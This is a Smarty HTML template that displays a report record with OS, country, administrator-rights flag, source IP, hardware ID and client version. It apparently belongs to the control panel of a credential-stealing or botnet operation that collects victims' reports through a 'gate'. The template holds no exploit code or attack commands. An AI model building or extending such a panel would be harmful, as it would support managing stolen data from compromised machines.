{assign var='no_code' value={$smarty.server.SCRIPT_NAME}|cat:"?action=reports&routine=view_report&report_id={$report_id}"}
{if {$smarty.request.routine|default:''} == 'confirm_delete'}
{assign var='msg' value="Are you sure you want to delete the report?"}
{assign var='yes_code' value={$smarty.server.SCRIPT_NAME}|cat:"?action=reports&routine=delete&report_id={$report_id}"}
{include file='confirm.tpl'}
{/if}
{if $report_id != '' && $report_id != '0' && isset($report) && is_array($report)}
Download the report ({$report_size|file_size})
Reprocess the report
{if $priv_can_delete}
Delete Report
{/if}
{/if}
{if isset($log_item) && is_array($log_item)}
| Log record data | |
| Text | {$log_item.log_line} |
| Additional Information | {$log_item.log_extra}
{if strstr($log_item.log_line, '_GATE_')}
(find in the logs by IP |
find in reports on IP)
{/if}
|
| Add time | {$log_item.import_time} |
{if $log_item.report_id != '0' && $log_item.report_id != ''}
| Report | {$log_item.report_id} |
{/if}
{else}
{if {$smarty.request.log_id|default:''} != '' && {$smarty.request.log_id|default:''} != '0'}
{include file='error.tpl' err_code='ERR_UNK_LOG_ID'}
{/if}
{/if}
{if isset($report) && is_array($report)}
| Report Details | |
| ID | {$report.report_id} |
| The size | {$report.report_len|file_size} |
| Processed | {$report.parsed|yes_no} |
| Add time | {$report.import_time} |
| OS | {$report.report_os_name} |
| Country | {$report.report_country} |
| 64-bit | {$report.report_is_win64|yes_no} |
| Running with administrator privileges | {$report.report_admin|yes_no} |
| IP | {$report.report_source_ip} {country base_path="includes/design/images/flags/" country_code=$report.report_source_ip_country_code country_name=$report.report_source_ip_country_name}
{if ($report.report_source_ip != '')}
(find in the logs by IP |
find in reports by IP)
{/if}
|
| HWID | {$report.report_hwid}
{if ($report.report_hwid != '')}
(find in the logs by HWID |
find in reports on HWID)
{/if}
|
| Client version | {$report.report_version} |
{else}
{if {$smarty.request.report_id|default:''} != '' && {$smarty.request.report_id|default:''} != '0'}
{include file='error.tpl' err_code='ERR_UNK_REPORT_ID'}
{/if}
{/if}